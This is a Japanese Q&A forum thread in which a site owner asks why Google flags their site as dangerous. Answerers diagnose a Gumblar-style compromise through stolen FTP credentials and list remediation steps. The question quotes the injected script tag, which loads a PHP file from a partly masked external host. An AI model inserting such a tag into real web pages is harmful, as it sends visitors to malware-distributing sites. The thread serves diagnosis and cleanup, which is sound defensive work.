googleで自分のサイトを検索すると、
「このウェブサイトにアクセスすると、コンピュータに損害が生じる可能性があります。」
と表示されてしまいます。。。
検索結果のもの全てではなく、自分のサイトだけにです。。。
管理者ページへ行くと、
「このサイトは悪意のあるソフトウェアを配布している可能性があります」と表示され、
「サイトから有害なコードが検出されました。」ということらしいのですが…
その詳細は、『挿入が疑われるコード』と共に、
<script src=http://mananvidya.***/******/gifimg.php ></script>
というものが表示されています。
しかし、自分のサイト内部をよく見ても、上記コードは見つかりませんでした。
HP作成に関しては、ほぼ素人なので難しいことはしていないのですが、
ホームページビルダーで作成したものです。
yahooやgooでは、検索して何事も無くそのページの飛べるのですが、googleだけこのように表示されてしまいます。
(yahooの審査では優良サイトとして通りました)
何故自分のサイトだけなのかお解りの方、どうすればいいのか解決策を教えていただければと思います。
困っています!!お願いします。
No.3ベストアンサー
- 回答日時:
お気の毒ですが、FTPのID・パスワードが盗まれてウエブサイトのページが改ざんされています。
独立行政法人情報処理推進機構でも再三にわたり注意を呼びかけています。
http://www.ipa.go.jp/security/txt/2010/04outline …
Windowsのアップデートや、こちらでチェックできるソフトのアップデートをやっていないパソコンが感染します。
アンチウイルスソフトでは感染を防止できません。
いわゆる「ガンブラー」なのですが、ANo.1さんの紹介ページの情報ではもはや古すぎます。
私が、上に紹介したページの情報でも古いくらいです。
多くの人が気がついていないだけで、7%くらいのパソコンが感染していると推測されています。
oyajimushiさんの遭遇している「ガンブラー」は、改ざんソースを全く難読化していませんのでここ4~5ヶ月前より始まったタイプです。
幾つもの中継サイトを転送し、アクセス時間帯により感染行動を変化させる検出しにくいタイプと思われます。
対策は、
サイトのファイルは決して削除しないでください。
(訪問者が404エラーとなり、危険サイトにリダイレクトされます。)
サーバー管理会社にサイトの非公開を依頼してください。
(サイト訪問者を安全な「メンテ中」ページにリダイレクトさせます。)
サーバー管理会社に依頼してFTPパスワードを変更してください。
必要データをバックアップして、パソコンをリカバリーしてください。
Windowsのアップデートやソフトのアップデートで最新状態にしてください。
アンチウイルスソフトをインストールしバックアップデータをチェックしてください。
(感染していないPCから検査すると見つかるウイルスもあります)
念のため、ホームページソースからJavascriptやiframeの記述を点検もしくは全て削除してください。
サイトの全ファイルを上書き更新してください。
FTPソフトで、サイト上に不審ファイルは無いか、全ディレクトリの検査をしてください。
(最新のタイムスタンプでないファイルがあれば不審ファイルという事になります)
サイトを再開、感染の報告と注意喚起を告示してください。
上記、独立行政法人情報処理推進機構に届出をお願いします。
なお、管理会社にFTPパスワードを変更してもらった後、新しいパスワードで接続した間のタイムスタンプでファイルが更新されていたら、あなたのPCではなく他のPC(たとえば管理会社)が感染していると考えられます。実際そのような事例があります。
No.4
- 回答日時:
No.3追加です。
疑わしいファイルを解析するサービスであるVirustotalで検出可能かどうか調査してみました。
Googleで指摘されたスクリプト
http://www.virustotal.com/jp/analisis/f4a289360d …
そのスクリプトによりリダイレクトされる、次なるスクリプト
http://www.virustotal.com/jp/analisis/18b424fbd2 …
さらにそのスクリプトによりリダイレクトされる、第3のスクリプトは取得拒否されました。
普通のブラウザではなく、スクリプトの効かないテキストブラウザでアクセスしたためと思われます。
ここで、ブラウザやOSなどにより最終的なマルウェアダウンロードサイトに仕分けされてリダイレクトされるものと思われます。
ご覧のように、このガンブラーは、ごくわずかのアンチウイルスエンジンのみが検出できています。
No.2
- 回答日時:
すみません、追伸です。
>>しかし、自分のサイト内部をよく見ても、上記コードは見つかりませんでした。
ご自身のPC側のサイトデータではなく、サーバにアップされた側のデータをご覧ください。
No.1
- 回答日時:
質問者さんのPCが、いわゆる「ガンブラーウィルス」に感染している可能性が高いです。
ご自身でサイトを作って、アップロードできる知識をお持ちでしたら、参考URLをご覧になれば対策がわかると思います。
参考URL:http://www.nca.gr.jp/2010/netanzen/index.html
お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!
似たような質問が見つかりました
- ネットワーク cutestat.comというサイトでipアドレスが確認できる件 1 2022/04/10 14:19
- その他(プログラミング・Web制作) パイソンでのプログラミングについて 3 2022/08/11 20:31
- ハッキング・フィッシング詐欺 JS/Packed.Agent.N が検出されたサイトにアクセスするとどうなる? 4 2022/08/12 18:28
- Access(アクセス) AccessVBAで降順にするテーブル作成クエリを使用して作成したテーブルを削除し同一のテーブル作成 1 2023/01/06 11:17
- SEO 意図しないページが検索ヒットする問題 2 2022/05/19 14:35
- アプリ Edgeを操作するアプリについて 4 2023/05/11 22:48
- メルカリ <メルカリShops>消費者庁による販売許可の出ている機能性表示食品?の調べ方から 1 2022/11/24 17:46
- 政治 マイナカード等デジタル化全般の問題点について 2 2022/12/27 18:12
- Wi-Fi・無線LAN PCWi-Fiの設定方法がわからなくて困っています。 4 2022/12/28 18:30
- その他(インターネット接続・インフラ) 有線LANでGoogleサイトのみ接続できません 2 2022/06/10 09:14
関連するカテゴリからQ&Aを探す
おすすめ情報
デイリーランキングこのカテゴリの人気デイリーQ&Aランキング
-
トロイの木馬に有効なオンライ...
-
買ったばかりのウイルスバスタ...
-
ブラウザ上に勝手にバナーが出...
-
有料アダルトサイトの駆除ツール
-
いつまで経ってもブラクラが直...
-
McAfee マカフィー ウィルスス...
-
パソコンから勝手に知らない音...
-
ファイルを削除しようとしたら ...
-
マカフィーで必要なファイルが...
-
パソコンのプロセスの重複起動...
-
私のPCが覗かれているか調べる方法
-
まじで助けてください 凄い恥ず...
-
Trojan:Script/Wacatac.H!ml っ...
-
ハードディスクの問題が検出さ...
-
Everything というフリーソフト...
-
コマンドプロンプトでのBATファ...
-
至急お願いします。 僕はノート...
-
パソコンのデスクトップ画面に...
-
トロイの木馬に感染しました!
-
こんなウインドウが出てきます
マンスリーランキングこのカテゴリの人気マンスリーQ&Aランキング
-
勝手に知らないサイトのページ...
-
動画再生&セキュリティスキャ...
-
トロイの木馬?ウイルス削除後...
-
トロイの木馬に感染しました。...
-
REDLOFというウイルスについて。
-
win10 画面にウイルス警告が出...
-
マカフィーの警告
-
起動時にエラーメッセージが出...
-
デスクトップ背景を乗っ取られ...
-
怪しいexeファイルを実行してし...
-
C:WINDOWS:system32のdixdiagn3...
-
AntiVirus2009?
-
mirarというツールバーの消し方
-
ウイルスに感染しているPCから...
-
ウイルスはHD交換すればOK?
-
トロイの木馬 デスクトップに...
-
トロイの木馬に感染!クリーン...
-
リカバリー領域へのウイルス感...
-
Trojan.Win32.Agent.zriという...
-
削除してもスパイウェアが消えない
おすすめ情報